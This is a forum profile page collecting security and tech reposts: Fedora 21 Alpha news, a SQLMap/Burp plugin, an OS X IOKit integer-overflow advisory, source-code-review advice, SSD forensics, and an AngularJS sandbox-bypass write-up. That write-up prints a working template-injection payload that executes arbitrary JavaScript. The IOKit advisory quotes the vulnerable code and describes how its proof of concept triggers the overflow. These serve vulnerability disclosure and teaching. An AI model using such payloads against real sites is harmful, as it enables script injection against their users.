Everything posted by Nytro
-
Fedora 21 Alpha Is Out – Screenshot Tour
The Fedora 21 Alpha can be downloaded from Softpedia
By Silviu Stahie on September 24th, 2014 07:36 GMT

The Fedora Project has announced that the first Alpha release of Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution.

The Fedora development team has been trying to get this Alpha release out the door for quite some time, and it has been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up for an on-time final release, though. The developers don't have the best track record at keeping a tight schedule for upcoming builds, so it's very likely that the final iteration will also be pushed back.

It's a new Fedora

Fedora 21 is the first release in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so the developers dropped the naming process entirely. Besides this simple change, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation.

"The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The final release of Fedora 21 is expected in December."

"We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide. Together, we can make Fedora a rock-solid distribution," say the developers.

Get the Fedora 21 Alpha and test it

As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build.

You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development.

Source: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
-
[h=1]SQLiPy: A SQLMap Plugin for Burp[/h]
By codewatch On September 22, 2014

I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general-purpose web app assessment tool, but if you perform web app assessments you probably already know that, because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past that, as flexible and extensible as Burp is, no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit into one of two categories:

- They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or
- They kick off a SQLMap scan and essentially display what you would see if it were run in a console window (like gason).

I'm not much of a developer, so I never really considered attempting to integrate the two myself until recently, when I was browsing the SQLMap directory on my machine and noticed the file sqlmapapi.py. I'd never noticed it before (I'm not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone had already done the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down, I set out to write the plugin.
The key features that I wanted to integrate were:

- The ability to start the API from within Burp. Note that this is not recommended, as one of the limitations of Jython is that when you start a process with popen you can't get the PID, which means you can't stop the process from within Jython (you have to kill it manually).
- A context menu option for sending a request in Burp to the plugin.
- A menu for editing and configuring the request prior to sending it to SQLMap.
- A thread that continuously checks up on executed scans to identify whether there were any findings.
- Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list.

All of those features have been integrated into this first release. I have limited ability to test, so I appreciate anyone who can use the plugin and provide feedback.

Some general notes on the plugin development:

- This is the first time I've attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it.
- This is also the first time I've used Jython, or used any Java GUI code. The code probably looks awful and I need more comments.
- See points 1 & 2 above and add in the fact that I'm not a developer.
- I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser, Burp SAML, ActiveScan++, WCF Binary SOAP Handler, WSDL Wizard, co2.

Full article: https://www.codewatch.org/blog/?p=402
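The API workflow the plugin drives can be sketched with nothing but the Python standard library. The endpoint paths (/task/new, /option/<taskid>/set, /scan/<taskid>/start) follow the unofficial API documentation linked above; the host and port are sqlmapapi.py's defaults, and any option names beyond "url" are illustrative:

```python
import json
import urllib.request

API = "http://127.0.0.1:8775"  # sqlmapapi.py default bind address

def option_payload(url, level=1, risk=1):
    """Build the JSON body for /option/<taskid>/set (option names per sqlmap)."""
    return {"url": url, "level": level, "risk": risk}

def call(path, payload=None):
    """POST JSON to the API (plain GET when payload is None) and decode the reply."""
    data = json.dumps(payload).encode() if payload is not None else None
    req = urllib.request.Request(API + path, data=data,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def start_scan(target_url):
    """Create a task, configure it, start the scan; returns the task id."""
    taskid = call("/task/new")["taskid"]
    call("/option/%s/set" % taskid, option_payload(target_url))
    call("/scan/%s/start" % taskid, {"url": target_url})
    return taskid
```

A plugin built on this would then poll /scan/<taskid>/status and /scan/<taskid>/data, which is essentially what SQLiPy's background thread does to populate the Scanner Results list.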
-
OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue

The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method:

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
    const UInt32 head      = dataQueue->head;  // volatile
    const UInt32 tail      = dataQueue->tail;
    const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;   // <-- (a)
    IODataQueueEntry * entry;

    if ( tail >= head )
    {
        // Is there enough room at the end for the entry?
        if ( (tail + entrySize) <= dataQueue->queueSize )               // <-- (b)
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);                       // <-- (c)

The additions at (a) and (b) should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer.

The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument; the bug itself is quite simple. The PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue). This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0, which maps an array of IOHIDElementValues into userspace:

typedef struct _IOHIDElementValue {
    IOHIDElementCookie cookie;
    UInt32             totalSize;
    AbsoluteTime       timestamp;
    UInt32             generation;
    UInt32             value[1];
} IOHIDElementValue;

The first dword of the mapped memory is a cookie value and the second is a size.
When the IOHIDElementPrivate::processReport method is invoked (in response to a HID event), if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory.

The PoC calls the startQueue selector to start the listening queue, then calls addElementToQueue, passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called, this will call IODataQueue::enqueue and overflow the calculation of the entry size such that it will attempt to memcpy 0xfffffffe bytes.

Note that the size of the queue buffer is also attacker controlled, and the kernel is 64-bit, so a 4GB memcpy is almost certainly exploitable.

Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also, the symbols for memcpy and real_mode_bootstrap_end seem to have the same address, so the lldb backtrace looks weird, but it is actually memcpy.

hidlib_enqueue_overflow.c (6.7 KB)

Source: https://code.google.com/p/google-security-research/issues/detail?id=39
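The overflow at (a) is plain UInt32 arithmetic, so it can be reproduced outside the kernel. A minimal sketch of why the 0xfffffffe totalSize makes the bounds check at (b) pass while memcpy still receives the huge length (the 8-byte header size is an assumed value for illustration):

```python
# Model the UInt32 arithmetic from IODataQueue::enqueue.
MASK32 = 0xFFFFFFFF
HEADER = 8  # stand-in for DATA_QUEUE_ENTRY_HEADER_SIZE (assumed value)

def entry_size(data_size):
    """entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE -- wraps at 2**32 (a)."""
    return (data_size + HEADER) & MASK32

def check_passes(tail, data_size, queue_size):
    """The bounds check at (b): (tail + entrySize) <= queueSize, all UInt32."""
    return ((tail + entry_size(data_size)) & MASK32) <= queue_size

# The PoC writes totalSize = 0xfffffffe into shared memory:
data_size = 0xFFFFFFFE
print(hex(entry_size(data_size)))        # wraps to 0x6
print(check_passes(0, data_size, 4096))  # True: the check at (b) passes...
# ...yet memcpy at (c) would still be called with length 0xfffffffe.
```

With the sane value 8192 against a 4096-byte queue the check correctly fails; only the wrapped value sneaks through, which is exactly what a checked addition at (a) and (b) would prevent.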
-
5 Vulnerabilities That Surely Need a Source Code Review
Nytro posted a topic in Tutoriale in engleza
[h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h]

We have been performing Source Code Review (SCR) of multiple Java/JavaEE based web applications during the recent past. The results have convinced us and our customers that SCR is a valuable exercise that must be performed for business-critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR and which are missed, or are very difficult to identify, during Penetration Testing. Additionally, we hope to answer the following commonly asked questions:

- I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application?
- What are the vulnerabilities found during Source Code Review that are often missed by an Application Penetration Test?

Read More: Web Application Penetration Testing Service

[h=3]Approach for Source Code Review[/h]

The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application, in terms of its source code and configuration, is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps:

[h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h]

A security weakness is an insecure practice, a dangerous API call, or an insecure design.
Some examples of weaknesses are:

- Dynamic SQL query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
- A dangerous or risky API call, such as RunTime.exec or Statement.execute
- An insecure design, such as using only MD5 hashing of passwords without any salt.

[h=4]Correlation between Security Weakness and Dynamic Input[/h]

Dynamic construction of an SQL query without the necessary validation or sanitization is definitely a security weakness; however, it may not lead to a security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with a user input and reach a possibly weak or risky code block. The absence of this phase will leave a huge number of false positives in the results. This step generally involves enumerating sources and finding a path between source and sink. A source in this case is any user-controlled and untrusted input, e.g. HTTP request parameters, cookies, uploaded file contents, etc.

[h=3]Five Vulnerabilities Source Code Review Should Find[/h]

[h=4]1. Insecure or Weak Cryptographic Implementation[/h]

SCR is a valuable exercise to discover weak or below-standard cryptography techniques used in applications, such as:

- Use of MD5 or SHA1 without salt for password hashing.
- Use of Java Random instead of SecureRandom.
- Use of weak DES encryption.
- Use of a weak mode of otherwise strong encryption, such as AES with ECB.
- Susceptibility to the Padding Oracle Attack.

[h=4]2. Known Vulnerable Components[/h]

For a small-to-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing the Maven POM file or the Ivy dependency file, or by looking into the lib directory. It is very common for dependent libraries and framework components to have known vulnerabilities, especially if the application has been developed over a considerable time frame.
As an example, during 2011 the following two vulnerable components were downloaded 22 million times:

- Apache CXF with an Authentication Bypass Vulnerability
- Spring Framework with a Remote Code Execution Vulnerability

During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of the exact version numbers of the various libraries and framework components used, something that is lacking during an Application Penetration Test.

[h=4]3. Sensitive Information Disclosure[/h]

An SCR should discover whether an application, in binary (jar/war) or source code form, may disclose sensitive information that could compromise the security of the production environment. Some of the commonly seen cases are:

- Logs: The application logs sensitive information, such as credentials or access keys, in log files.
- Configuration files: The application discloses sensitive information, such as shared secrets or passwords, in plain-text configuration files.
- Hardcoded passwords and keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data.
- Email addresses of developers in comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers for launching social engineering or spear phishing attacks.

[h=4]4. Insecure Functionalities[/h]

An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some examples of legacy functionality with known security issues are given below:

- RMI calls over an insecure channel.
- Kerberos implementations that are vulnerable to replay attacks.
- Legacy authentication & authorization techniques with known weaknesses.
- J2EE bad practices, such as direct management of database/resource connections, that may lead to a Denial of Service.
- Race condition bugs.

[h=4]5. Security Misconfiguration[/h]

SCR should be able to find common security misconfigurations in the application and its deployed environment, related to database configuration, frameworks, application containers, etc. Some of the commonly discovered issues include:

- Application containers and database servers running with the highest (unnecessary) privileges.
- Default accounts with passwords enabled and unchanged.
- Insecure local file storage.

[h=3]Additional Notes[/h]

An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above.

- It is possible to conduct an in-depth review of the implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention, etc. It is not uncommon to find code that lacks or misuses such controls in a vulnerable manner, resulting in a bypass of the protection.
- There are multiple APIs that are considered risky or insecure per various secure coding guidelines. It is possible to discover usage of such APIs in a given application easily and quickly during an SCR process.
- SCR has the added benefit of being non-disruptive, i.e. this activity does not require access to the production environment and will not cause any service disruption.

Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your enterprise application. It discovers certain classes of vulnerabilities which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways, and both independently contribute to enhancing the overall security of the application and infrastructure.

Source: 5 Vulnerabilities That Surely Need a Source Code Review
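The first two weakness classes discussed in the article, dynamic SQL construction and unsalted fast hashing, can be contrasted with their usual fixes in a short, self-contained sketch. This uses Python stand-ins for the Java examples; the table, rows, and input values are purely illustrative:

```python
import hashlib
import os
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
conn.execute("INSERT INTO items VALUES ('bob', 'secret')")

user_name, item_name = "alice", "x' OR '1'='1"

# Weakness: dynamic SQL -- untrusted input becomes part of the SQL grammar.
query = ("SELECT * FROM items WHERE owner = '" + user_name +
         "' AND itemname = '" + item_name + "'")
leaked = conn.execute(query).fetchall()   # injection: returns bob's row

# Fix: a parameterized query keeps the input strictly as data.
rows = conn.execute(
    "SELECT * FROM items WHERE owner = ? AND itemname = ?",
    (user_name, item_name),
).fetchall()                              # returns nothing, as intended

# Weakness: unsalted fast hash -- identical passwords hash identically.
weak = hashlib.md5(b"s3cret").hexdigest()

# Fix (sketch): per-user random salt plus a deliberately slow KDF.
salt = os.urandom(16)
strong = hashlib.pbkdf2_hmac("sha256", b"s3cret", salt, 100_000)
```

During an SCR, the reviewer's job is precisely to spot the first pattern in each pair and confirm whether untrusted data can actually reach it.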
Yes. "If you compare a pointer to a function with a number, I automatically convert them to strings and compare them as character strings" - JavaScript. Because fuck logic, that's why.
-
[ASCII-art banner: AngularJS sandbox bypass]

In my recent research I discovered a bypass of the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope while not breaking any of the implemented rules (e.g. the Function constructor can't be accessed directly). The main reason I was able to do this is that functions executing callbacks, such as Array.sort(), Array.map() and Array.filter(), are allowed. If we use the Function constructor as the callback, we can carefully construct a payload that generates a valid function for which we control both the arguments and the function body. This results in a sandbox bypass. Example:

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

JSFiddle: http://jsfiddle.net/uwwov8oz

Let's break that down. The Function constructor can be accessed via toString.constructor, so the payload is equivalent to:

{{Function.prototype.toString=Function.prototype.call;["a","alert(1)"].sort(Function)}}

We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this pseudo-code:

if(Function("a","alert(1)") > 1){
    //Sort element "a" as bigger than "alert(1)"
}else if(Function("a","alert(1)") < 1){
    //Sort element "a" as smaller than "alert(1)"
}else{
    //Sort elements as same
}

Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that.
if((function(a){alert(1)}) > 1){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}) < 1){
    //Sort element "a" as smaller than "alert(1)"
}else{
    //Sort elements as same
}

Now, to understand the next part we must know how JS internally handles comparison of functions. It will convert the function to a string using the toString method (inherited from Object) and compare it as a string. We can show this by running this code: alert==alert.toString().

if((function(a){alert(1)}).toString() > 1..toString()){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}).toString() < 1..toString()){
    //Sort element "a" as smaller than "alert(1)"
}else{
    //Sort elements as same
}

So to sum up: we can create a function where we control the arguments ("a") as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString function with the Function.prototype.call function, and when the comparison runs in the pseudo-code, it will run like this:

if((function(a){alert(1)}).call() > 1..toString()){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}).call() < 1..toString()){
    //Sort element "a" as smaller than "alert(1)"
}else{
    //Sort elements as same
}

Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions.

I'm not really sure why using the constructor property like this (e.g. toString.constructor) works, since it didn't in 1.2.18 and down.

Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!)
and I got a $5000 bug bounty for this bypass.

Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8

over and out,
avlidienbrunn

Source: http://avlidienbrunn.se/angular.txt
-
Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions
Posted by belkasoft, September 23, 2014

We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about the many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives.

Introduction

Several years ago, solid state drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, with SSD drives we are in the waters of stochastic forensics, where nothing can be assumed as a given.

With even the most recent publications not going beyond introducing the TRIM command and drawing a conclusion about SSD self-corrosion, it has been common knowledge - and a common misconception - that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments, or on external SSD drives attached in a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands.
And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot practically be imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable - even on today's TRIM-enabled SSD drives.

SSD Self-Corrosion

In case you haven't read our 2012 paper on SSD forensics, let's briefly review why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files and data that a suspect attempted to destroy (e.g. by formatting the disk, even if "Quick Format" was used) may be lost forever in a matter of minutes. Even shutting the affected computer down immediately after a destructive command has been issued does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content all by itself, even if installed in a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it - unless we're talking about some extremely important evidence, in which case the disk, accompanied by a court order, can be sent to the manufacturer for low-level, hardware-specific recovery.

The evidence self-destruction process is triggered by the TRIM command, issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition.
The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data; and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain a better understanding of the situations in which deleted data can still be recovered from an SSD drive. Before we begin that part, however, let's see how the SSD drives of 2014 differ from the SSD drives made in 2012.

Checking TRIM Status

When analyzing a live system, it is easy to check the TRIM status of a particular SSD device by issuing the following command in a terminal window:

fsutil behavior query disabledeletenotify

You'll get one of the following results:

DisableDeleteNotify = 1, meaning that Windows TRIM commands are disabled
DisableDeleteNotify = 0, meaning that Windows TRIM commands are enabled

fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with "fsutil behavior set disabledeletenotify 0" or disable TRIM with "fsutil behavior set disabledeletenotify 1".

Figure 1: TRIM, image taken from http://www.corsair.com/us/blog/how-to-check-that-trim-is-active/

Note that using this command only makes sense when analyzing an SSD which is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant.

SSD Technology: 2014

Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This has not changed in 2014. Two years ago, SSD compression already existed in SandForce SSD controllers (http://en.wikipedia.org/wiki/SandForce).
However, relatively few models were equipped with encrypting or compressing controllers. As SandForce remained the only compressing controller, it was easy to determine whether this was the case (http://www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware-controlled version of a SandForce controller to implement data compression in 3xx and 5xx series SSDs (http://www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of an SSD as the inherent benefits (http://www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http://blog.goplextor.com/?p=3313), and so are most other controllers on the market, including the new budget option, Phison.

Why so much fuss about data compression in SSD drives? Because the use of any technology that alters binary data before it ends up in the flash chips makes its recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present or not, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http://www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of the rare exceptions.

Let's conclude this chapter with a quote from PC World: "The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest." (http://www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html) In other words, SSDs get bigger and cheaper, inevitably demanding cost-saving measures which, in turn, may affect how deleted data are handled on these SSD drives, in a way described later in the "Reality Steps In: Why SSDs from Sub-Notes are Recoverable" chapter.
SSD Manufacturers

In recent years, we've seen a lot of new SSD "manufacturers" entering the arena. These companies don't normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, have enabled dozens of "manufacturers" to make hundreds of nearly indistinguishable SSD models. So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http://www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/)

Hardware for SSD Forensics (and Why It Has Not Arrived)

Little has changed since 2012 in regard to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, with BGA flash chip acquisition kits as rare as hen's teeth. Why so few chip-off solutions for SSD drives, compared to the number of companies doing mobile chip-off? It's hard to say for sure, but it's possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, the internal data structures in today's SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines make the actual data content stored on the flash chips inside SSD drives heavily fragmented.
We're not talking about logical fragmentation at the file system level (which already is a problem, as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file to various physical addresses on numerous physical flash chips. In particular, massive parallel writes are what make SSD drives so much faster than traditional magnetic drives (as opposed to the sheer writing speed of single flash chips).

One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on the acquisition technique (and speed) as on the particular implementation of a particular SSD controller.

Deterministic Read After Trim

So let's say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and is available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience recovering information from SSD drives varies greatly among SSD users. "I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes", said one Belkasoft customer. "We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect's laptop. We were able to recover 80% of deleted files several hours after they had been deleted", said another Belkasoft user.

[Figure: Carving options in Belkasoft Evidence Center; for the experiment we set "Unallocated clusters only" and the SSD drive connected as physical drive 0.]

Why such a big inconsistency in user experiences?
The answer lies in the way different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) and Deterministic Zeroes After Trim (DZAT), returning all zeroes immediately after the TRIM command has released a certain data block, while other drives do not implement this protocol and will return the original data until it is physically erased by the garbage collection algorithm. Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify whether their SSD drives use DRAT or DZAT by issuing the hdparm -I command, which reports whether the drive supports TRIM and “Deterministic Read After Trim”. Example:

$ sudo hdparm -I /dev/sda | grep -i trim
* Data Set Management TRIM supported (limit 1 block)
* Deterministic read data after TRIM

The adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives with and without DRAT support. In 2014, the majority of new models came equipped with DRAT or DZAT. There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives.

Non-deterministic TRIM: each read command after a TRIM may return different data.

Deterministic TRIM (DRAT): all read commands after a TRIM shall return the same data, or become determinate. Note that this level of TRIM does not necessarily return all zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same (“determined”) before and after the affected page has been processed by the garbage collection algorithm, and until new data are written to the page. As a result, the data returned by SSD drives supporting DRAT as opposed to DZAT can be all zeroes, all ones, or some other data, or it could be the original pre-trim data stored in that logical page.
The essential point here is that the values read from a trimmed logical page do not change from the moment the TRIM command is issued until the moment new data are written into that logical page.

Deterministic Read Zero after Trim (DZAT): all read commands after a TRIM shall return zeroes until new data are written to the page.

As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks have been cleaned immediately following the TRIM command, but because the SSD controller reports that there is no valid data held at the trimmed address on the logical level previously associated with the trimmed physical block. If, however, one could read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, then the original data could be obtained from those physical blocks until the blocks are physically erased by the garbage collector. Apparently, there is no way to address the physical data blocks via the standard ATA command set; however, the disk manufacturer could most probably do this in their own lab. As a result, sending the trimmed SSD disk to the manufacturer for recovery may be a viable proposition if some extremely important evidence is concerned. Notably, DRAT is not implemented in Windows, as NTFS does not allow applications to read the trimmed data.

Acquiring Evidence from SSD Drives

So far the only practical way of obtaining evidence from an SSD drive remains traditional imaging (with a dedicated hardware/software combination), followed by analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http://forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive.
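The three read-after-TRIM behaviors described above can be illustrated with a small simulation. This is a hypothetical model written for this article, not vendor firmware; page size, behavior names and the choice of zeroes as the DRAT "determined" value are all assumptions:

```python
import random

PAGE_SIZE = 4096  # assumed 4 KB logical page, typical for the era

class SimulatedPage:
    """Toy model of one logical SSD page under the three TRIM read behaviors."""

    def __init__(self, behavior):
        assert behavior in ("non-deterministic", "DRAT", "DZAT")
        self.behavior = behavior
        self.data = b"\x00" * PAGE_SIZE
        self.trimmed = False
        self._drat_value = None

    def write(self, data):
        self.data = data.ljust(PAGE_SIZE, b"\x00")[:PAGE_SIZE]
        self.trimmed = False

    def trim(self):
        self.trimmed = True
        if self.behavior == "DRAT":
            # The value is fixed ("determined") at trim time. We pick zeroes
            # here, but a real DRAT drive may equally return the old data or
            # some other constant -- only the stability of reads is guaranteed.
            self._drat_value = b"\x00" * PAGE_SIZE

    def read(self):
        if not self.trimmed:
            return self.data
        if self.behavior == "DZAT":
            return b"\x00" * PAGE_SIZE          # always zeroes after TRIM
        if self.behavior == "DRAT":
            return self._drat_value             # same value on every read
        # Non-deterministic: the original data may or may not surface
        # until garbage collection physically erases the block.
        return self.data if random.random() < 0.5 else b"\x00" * PAGE_SIZE

# A DZAT drive yields zeroes immediately after TRIM -- nothing left to carve:
page = SimulatedPage("DZAT")
page.write(b"EVIDENCE")
page.trim()
print(page.read() == b"\x00" * PAGE_SIZE)  # True

# A DRAT drive yields the same value on every read after TRIM:
page = SimulatedPage("DRAT")
page.write(b"EVIDENCE")
page.trim()
print(page.read() == page.read())  # True
```

The non-deterministic case is the forensically interesting one: reads may still surface the original data until garbage collection catches up, which is exactly why acquisition speed matters.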
